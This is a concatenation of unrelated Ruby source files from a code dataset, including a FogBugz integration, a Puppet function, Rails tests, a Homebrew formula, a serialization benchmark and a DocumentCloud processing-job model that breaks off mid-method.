log "Received verification failed: Response: #{error}"
end
[false, 'Oops! Please check your API key again.']
end
end
private
def fogbugz_url(params={})
query_params = params.map { |k,v| "#{k}=#{v}" }.join('&')
"#{config[:project_url]}/api.asp?token=#{config[:api_token]}&#{query_params}"
end
def build_case_event(payload)
users_text = if payload[:impacted_devices_count] == 1
'This issue is affecting at least 1 user who has crashed '
else
"This issue is affecting at least #{payload[:impacted_devices_count]} users who have crashed "
end
crashes_text = if payload[:crashes_count] == 1
'at least 1 time.'
else
"at least #{payload[:crashes_count]} times."
end
<<-EOT
Crashlytics detected a new issue.
#{payload[:title]} in #{payload[:method]}
#{users_text}#{crashes_text}
More information: #{payload[:url]}
EOT
end
def parse_response(response, subject_selector)
xml = Nokogiri.XML(response.body)
error = xml.at('response/error')
subject = xml.at(subject_selector)
[subject, error]
end
end
| 27.404494 | 124 | 0.653137 |
1df1392d247d8ff1d7bc445e79cfc4963a6af3ae | 1,318 | #
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#
module Puppet::Parser::Functions
newfunction(:hdp_host_attribute, :type => :rvalue) do |args|
args = function_hdp_args_as_array(args)
hash,attr,source = args
ret_val = lambda do |hash,attr,s|
ret = ""
ndx = hash[s]
unless function_hdp_is_empty(ndx)
val = ndx[attr]
ret = function_hdp_is_empty(val) ? "" : val
end
ret
end
if source.kind_of?(Array)
source.map{|s|ret_val.call(hash,attr,s)}
else
ret_val.call(hash,attr,source)
end
end
end
| 32.146341 | 62 | 0.707891 |
ac44aff963c82c98fe4784102d9bc35399cd1c86 | 512 | require 'object_protocol/satisfiable_message_sequence_expectation_base'
class ObjectProtocol
class SatisfiableOrderedMessageSequenceExpectation < SatisfiableMessageSequenceExpectationBase
def attempt_to_apply_sent_message(sent_message)
return if satisfied?
next_unsatisfied_expectation = satisfiable_expectations.find(&:unsatisfied?)
next_unsatisfied_expectation.attempt_to_apply_sent_message(sent_message)
end
private
def inspect_name
"in_order"
end
end
end
| 25.6 | 96 | 0.810547 |
1c9095beca3eadf5b42170c4d6baafc89dd55435 | 5,477 | # module Importers::Mhc
# class ConversionEmployerUpdate < ConversionEmployer
#
# def initialize(opts = {})
# super(opts)
# end
#
# # covered scenarios
# # if broker is hired/terminated, then updated_at column in employer_profile model is changed.
# # if office locations is updated, then updated_at column in organization model is changed.
# # if employer info is updated, then updated_at column in employer_profile model is changed.
# # if broker_agency_profile info is updated, then updated_at column in broker_agency_profile model is changed.
#
# def has_data_not_changed_since_import
# has_organization_info_changed?
# has_employer_info_changed?
# has_office_locations_changed?
# has_broker_agency_profile_info_changed?
# end
#
# def find_organization
# return nil if fein.blank?
# Organization.where(:fein => fein).first
# end
#
# def employer_profile
# find_organization.try(:employer_profile)
# end
#
# def broker_agency_profile
# employer_profile.try(:broker_agency_profile)
# end
#
# def has_organization_info_changed?
# organization = find_organization
# if organization.present? && organization.updated_at > organization.created_at
# errors.add(:organization, "import cannot be done as organization info was updated on #{organization.updated_at}")
# end
# end
#
# def has_employer_info_changed?
# if employer_profile.present? && employer_profile.updated_at > employer_profile.created_at
# errors.add(:employer_profile, "import cannot be done as employer updated the info on #{employer_profile.updated_at}")
# end
# end
#
# def has_broker_agency_profile_info_changed?
# if broker_agency_profile.present? && broker_agency_profile.updated_at > broker_agency_profile.created_at
# errors.add(:broker_agency_profile, "import cannot be done as broker agency profile was updated on #{employer_profile.updated_at}")
# end
# end
#
# def has_office_locations_changed?
# organization = find_organization
# if organization.present?
# organization.office_locations.each do |office_location|
# address = office_location.try(:address)
# if address.present? && address.updated_at.present? && address.created_at.present? && address.updated_at > address.created_at
# errors.add(:organization, "import cannot be done as office location was updated on #{address.updated_at}.")
# end
# end
# end
# end
#
# def save
# organization = find_organization
# begin
# if organization.blank?
# errors.add(:fein, "employer don't exists with given fein")
# end
# has_data_not_changed_since_import
#
# if errors.empty?
# puts "Processing Update #{fein}---Data Sheet# #{legal_name}---Enroll App# #{organization.legal_name}" unless Rails.env.test?
# organization.legal_name = legal_name
# organization.dba = dba
# organization.office_locations = map_office_locations
#
# if broker_npn.present?
# broker_exists_if_specified
# br = BrokerRole.by_npn(broker_npn).first
# if br.present? && organization.employer_profile.broker_agency_accounts.where(:writing_agent_id => br.id).blank?
# organization.employer_profile.broker_agency_accounts = assign_brokers
# end
# end
#
# broker = find_broker
# general_agency = find_ga
#
# if broker.present? && general_agency.present?
#
# general_agency_account = organization.employer_profile.general_agency_accounts.where({
# :general_agency_profile_id => general_agency.id,
# :broker_role_id => broker.id
# }).first
#
# if general_agency_account.present?
#
# organization.employer_profile.general_agency_accounts.each do |account|
# if (account.id != general_agency_account.id && account.active?)
# account.terminate! if account.may_terminate?
# end
# end
#
# general_agency_account.update_attributes(:aasm_state => 'active') if general_agency_account.inactive?
# else
# if new_account = assign_general_agencies.first
# organization.employer_profile.general_agency_accounts.each{|ac| ac.terminate! if ac.may_terminate? }
# organization.employer_profile.general_agency_accounts << new_account
# end
# end
# end
# update_result = organization.save
# else
# update_result = false # if there are errors, then return false.
# end
#
# rescue Mongoid::Errors::UnknownAttribute
# organization.employer_profile.plan_years.each do |py|
# py.benefit_groups.each{|bg| bg.unset(:_type) }
# end
# update_result = errors.empty? && organization.save
# rescue Exception => e
# puts "FAILED.....#{e.to_s}"
# end
#
# begin
# if update_result
# update_poc(organization.employer_profile)
# end
# rescue Exception => e
# puts "FAILED.....#{e.to_s}"
# end
#
# if organization
# propagate_errors(organization)
# end
#
# return update_result
# end
# end
# end
| 38.300699 | 140 | 0.646157 |
e8c6ec4ceb58ca90f03f1a0211b205dfb2085941 | 1,670 | # frozen_string_literal: true
RSpec.describe GemComet::VersionHistory do
let(:instance) { described_class.new }
let(:git_tag_result) do
<<~RESULT
v0.1.0 2019-07-15
v0.1.1 2019-10-13
v0.2.0 2019-10-14
v0.3.0 2019-10-19
RESULT
end
before do
allow(instance).to receive(:git_tag_list).and_return(git_tag_result)
end
describe '#versions' do
it 'returns an array of version numbers' do
expect(instance.versions).to eq %w[v0.1.0 v0.1.1 v0.2.0 v0.3.0 HEAD]
end
end
describe '#previous_version_from' do
subject(:previous_version) { instance.previous_version_from(version) }
context 'with the first version number' do
let(:version) { 'v0.1.0' }
it { is_expected.to be_nil }
end
context 'with "v0.2.0", which is the next version of "v0.1.1"' do
let(:version) { 'v0.2.0' }
it { is_expected.to eq 'v0.1.1' }
end
context 'with a wrong version number' do
let(:version) { 'xxx' }
it { expect { previous_version }.to raise_error 'The specified version cannot be found' }
end
end
describe '#versioning_date_of' do
subject(:versioning_date) { instance.versioning_date_of(version) }
context 'with "HEAD"' do
let(:version) { 'HEAD' }
it { is_expected.to eq Date.today }
end
context 'with "v0.2.0", which added at 2019-10-14' do
let(:version) { 'v0.2.0' }
it { is_expected.to eq Date.new(2019, 10, 14) }
end
context 'with a wrong version number' do
let(:version) { 'xxx' }
it { expect { versioning_date }.to raise_error 'The specified version cannot be found' }
end
end
end
| 24.202899 | 95 | 0.635928 |
7a47dde5984ca5510e84f4f03513170bbdd2d607 | 1,514 | require 'test_helper'
class Pd::RegionalPartnerProgramManagerTest < ActiveSupport::TestCase
test 'pd_workshops association' do
partner_organizer = create :workshop_organizer
regional_partner_program_manager = create :regional_partner_program_manager, program_manager: partner_organizer
non_partner_organizer = create :workshop_organizer
partner_workshop = create :workshop, organizer: partner_organizer
non_partner_workshop = create :workshop, organizer: non_partner_organizer
assert regional_partner_program_manager.pd_workshops_organized.include? partner_workshop
refute regional_partner_program_manager.pd_workshops_organized.include? non_partner_workshop
end
test 'program manager permission with single partner' do
program_manager = create :teacher
refute program_manager.program_manager?
regional_partner_program_manager = create :regional_partner_program_manager, program_manager: program_manager
assert program_manager.program_manager?
regional_partner_program_manager.destroy
refute program_manager.program_manager?
end
test 'program manager permission with multiple partners' do
program_manager = create :teacher
refute program_manager.program_manager?
regional_partner_program_managers = create_list :regional_partner_program_manager, 2, program_manager: program_manager
assert program_manager.program_manager?
regional_partner_program_managers.first.destroy
assert program_manager.program_manager?
end
end
| 40.918919 | 122 | 0.830911 |
1a2f44bad2caf6f21741f7c2e635c36d05dcee02 | 470 | require 'formula'
class Libechonest < Formula
homepage 'https://projects.kde.org/projects/playground/libs/libechonest'
url 'http://files.lfranchi.com/libechonest-2.2.0.tar.bz2'
sha1 'fec281d9288c2a4fabd2dd275f1a508dd6d1bc5c'
depends_on 'cmake' => :build
depends_on 'qt'
depends_on 'qjson'
conflicts_with 'doxygen', :because => "cmake fails to configure build."
def install
system "cmake", ".", *std_cmake_args
system "make install"
end
end
| 24.736842 | 74 | 0.729787 |
03f9f3fa56e8b83c77ec239a91ad97905ca65f76 | 15,008 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copeyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# == Schema Information
#
# Table name: resource_types
#
# id :integer not null, primary key
# name :string(255)
# description :string(255)
# created_at :datetime not null
# updated_at :datetime not null
#
require 'test_helper'
class ResourceTypeTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
setup do
@resource_type = resource_types(:one)
end
######################################################################
test "resource type name should be unique" do
resource_type2 = ResourceType.new(name: @resource_type.name)
resource_type2.save
assert_not_nil resource_type2.errors.messages[:name], "allowed duplicate name"
end
end
| 68.218182 | 206 | 0.634928 |
ed59dd63cbc4c6effe33d3b1b25aa357fc7bb591 | 1,654 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe GroupsController, type: :controller do
describe 'GET' do
it 'redirects if not authenticated' do
get :index
expect(response).to have_http_status(:redirect)
end
it 'gets to index of groups if authenticated' do
sign_in create(:user)
get :index
expect(response).to have_http_status(:success)
end
it 'renders the index template' do
sign_in create(:user)
get :index
expect(response).to render_template('index')
end
end
describe 'GET new' do
it 'redirects to login if not authenticated' do
get :new
expect(response).to have_http_status(:redirect)
end
it 'gets to new group form authenticated' do
sign_in create(:user)
get :new
expect(response).to have_http_status(:success)
end
it 'renders the index template' do
sign_in create(:user)
get :new
expect(response).to render_template('new')
end
end
describe 'POST to /groups' do
it 'redirects to login if not authenticated' do
post :create
expect(response).to have_http_status(:redirect)
end
it 'renders new in presence of invalid/incomplete data' do
sign_in create(:user)
post :create, params: { group: {} }
expect(response).to redirect_to('/groups/new')
end
it 'renders index after saving valid task' do
sign_in create(:user)
post :create, params: { group: {
name: 'Sample Group'
} }
expect(response).to have_http_status(:redirect)
expect(response).to redirect_to('/groups')
end
end
end
| 25.060606 | 62 | 0.655381 |
1da764f40bbde4d481c8aedc30d8cd5be11969eb | 313 | class Order < ApplicationRecord
has_many :order_items
before_save :set_subtotal
def subtotal
order_items.collect{|order_item| order_item.valid? ? order_item.unit_price*order_item.quantity : 0}.sum
end
private
def set_subtotal
self[:subtotal] = subtotal
end
end
| 15.65 | 111 | 0.690096 |
91dd6589dd87e4ee2df9a70ab5bde4aa451d1372 | 780 | module Barometer
module Query
module Service
class WeatherId
class Api < Utils::Api
def url
'http://wxdata.weather.com/wxdata/search/search'
end
def params
{ where: format_query }
end
def unwrap_nodes
['search']
end
private
# filter out words that weather.com has trouble geo-locating
# mostly these are icao related
#
def format_query
output = query.q.dup
words_to_remove = %w(international airport municipal)
words_to_remove.each do |word|
output.gsub!(/#{word}/i, "")
end
output
end
end
end
end
end
end
| 21.666667 | 70 | 0.502564 |
384ab902b786979d33d2d488099d22e1f9873e2e | 181 | FactoryGirl.define do
factory :ecm_cms_page_content_block, class: Ecm::Cms::Page::ContentBlock do
body 'Content block body'
ecm_cms_content_box
ecm_cms_page
end
end
| 22.625 | 77 | 0.762431 |
6a5e3f1d0298bfe45911f4adfea7ef7c880643c0 | 110 | class AddIndexOnOnestopIds < ActiveRecord::Migration
def change
add_index :stops, :onestop_id
end
end
| 18.333333 | 52 | 0.772727 |
f7dde5edf5668b7ccc3e4b90cd5521f3634cf614 | 782 | require 'test_helper'
module Moderator
module Post
class QueuesControllerTest < ActionController::TestCase
context "The moderator post queues controller" do
setup do
@admin = FactoryGirl.create(:admin_user)
CurrentUser.user = @admin
CurrentUser.ip_addr = "127.0.0.1"
@post = FactoryGirl.create(:post, :is_pending => true)
end
context "show action" do
should "render" do
get :show, {}, {:user_id => @admin.id}
assert_response :success
end
end
context "random action" do
should "render" do
get :random, {}, {:user_id => @admin.id}
assert_response :success
end
end
end
end
end
end
| 24.4375 | 64 | 0.560102 |
acc8e1dd854c79b8dcbf4f0b1a34cc2ac4804b4a | 1,253 | require_relative '../../../automated_init'
context "Output" do
context "Debug Level" do
context "Context" do
output = Output::Levels::Debug.new
output.writer.enable_styling!
control_fixture = Controls::Fixture.example(output)
control_fixture.instance_exec do
context "Outer Context" do
context "Pass" do
comment "Comment #1"
end
context do
comment "Comment #2"
end
context "Skip"
context
context "Failure" do
comment "Comment #3"
test_session.fail!
end
end
context "Skipped Outer Context"
end
test do
assert(output.writer.written?(<<~TEXT))
\e[32mOuter Context\e[39m
\e[32mPass\e[39m
Comment #1
\e[2;3;32mFinished context "Pass" (Result: pass)\e[39;23;22m
Comment #2
\e[33mSkip\e[39m
\e[32mFailure\e[39m
Comment #3
\e[2;3;31mFinished context "Failure" (Result: failure)\e[39;23;22m
\e[2;3;31mFinished context "Outer Context" (Result: failure)\e[39;23;22m
\e[33mSkipped Outer Context\e[39m
TEXT
end
end
end
end
| 22.375 | 80 | 0.551476 |
1a8fdc1d35f789bc91a0f9823de31faa9ca2eab5 | 590 | #!/usr/bin/env ruby
# frozen_string_literal: true
require 'thor'
require "#{ROOT_DIR}/lib/framework/logging/logger.rb"
Facter::Log.output(STDERR)
require "#{ROOT_DIR}/lib/facter"
require "#{ROOT_DIR}/lib/framework/cli/cli"
Facter::OptionsValidator.validate(ARGV)
ARGV.unshift(Facter::Cli.default_task) unless
Facter::Cli.all_tasks.key?(ARGV[0]) ||
Facter::Cli.instance_variable_get(:@map).key?(ARGV[0])
begin
Facter::Cli.start(ARGV, debug: true)
rescue Thor::UnknownArgumentError => e
Facter::OptionsValidator.write_error_and_exit("unrecognised option '#{e.unknown.first}'")
end
| 29.5 | 91 | 0.757627 |
9195ae87701031522a6d7bffd1792f85fbb2231e | 1,277 | require 'oregano'
class Benchmarker
def initialize(target, size)
@size = size
@direction = ENV['SER_DIRECTION'] == 'generate' ? :generate : :parse
@format = ENV['SER_FORMAT'] == 'pson' ? :pson : :json
puts "Benchmarker #{@direction} #{@format}"
end
def setup
end
def generate
path = File.expand_path(File.join(__FILE__, '../catalog.json'))
puts "Using catalog #{path}"
@data = File.read(path)
@catalog = JSON.parse(@data)
end
def run(args=nil)
0.upto(@size) do |i|
# This parses a catalog from JSON data, which is a combination of parsing
# the data into a JSON hash, and the parsing the hash into a Catalog. It's
# interesting to see just how slow that latter process is:
#
# Oregano::Resource::Catalog.convert_from(:json, @data)
#
# However, for this benchmark, we're just testing how long JSON vs PSON
# parsing and generation are, where we default to parsing JSON.
#
if @direction == :generate
if @format == :pson
PSON.dump(@catalog)
else
JSON.dump(@catalog)
end
else
if @format == :pson
PSON.parse(@data)
else
JSON.parse(@data)
end
end
end
end
end
| 25.54 | 80 | 0.593579 |
0394cd20125d880b8a31b82623902204b74f9596 | 3,984 | # A ProcessingJob is the point of control for
# initiating and checking on CloudCrowd::Jobs.
class ProcessingJob < ActiveRecord::Base
#include DC::Status
belongs_to :account
belongs_to :document
validates :cloud_crowd_id, :presence=>true
#validates :action, :presence => true
attr_accessor :remote_job
scope :incomplete, ->{ where :complete => false }
# Quick lookup to find a ProcessingJob from JSON of a CloudCrowd::Job
def self.lookup_by_remote(attrs)
self.find_by_cloud_crowd_id attrs.fetch('id')
end
# CloudCrowd endpoint to POST work to.
def self.endpoint
"#{DC::CONFIG['cloud_crowd_server']}/jobs"
end
# A serializer which outputs the attributes needed
# to post to CloudCrowd.
class CloudCrowdSerializer < ActiveModel::Serializer
attributes :action, :inputs, :options, :callback_url
def options; object.options; end
# inputs should always be an array of documents.
def inputs; [object.document_id]; end
def callback_url
case object.action
when "update_access"
"#{DC.server_root(:ssl => false)}/import/update_access"
else
"#{DC.server_root(:ssl => false)}/import/cloud_crowd"
end
end
end
# Validate and initiate this job with CloudCrowd.
def queue
# If a Document is associated with this ProcessingJob, determine
# whether the Document is available to be worked on, and if it's not
# use ActiveRecord's error system to indicate it's unavailability.
#if document and document.has_running_jobs?
# errors.add(:document, "This document is already being processed") and (return false)
#
# # in future we'll actually lock the document
# # Lock the document & contact CloudCrowd to start the job
# #document.update :status => UNAVAILABLE
#end
begin
# Note the job id once CloudCrowd has recorded the job.
@response = RestClient.post(ProcessingJob.endpoint, {:job => CloudCrowdSerializer.new(self).to_json})
@remote_job = JSON.parse @response.body
self.cloud_crowd_id = @remote_job['id']
# We've collected all the info we need, so
save # it and retain the lock on the document.
rescue Errno::ECONNREFUSED, RestClient::Exception => error
LifecycleMailer.exception_notification(error).deliver_now
# In the event of an error while communicating with CloudCrowd, unlock the document.
self.update_attributes :complete => true
#document.update :status => AVAILABLE
raise error
end
end
def resolve(cloud_crowd_job, &blk)
@remote_job = cloud_crowd_job
begin
# Handle Document Jobs
if self.document
unless @remote_job['status'] == "succeeded"
logger.error("Document import failed: " + @remote_job.inspect)
document.update_attributes(:access => DC::Access::ERROR)
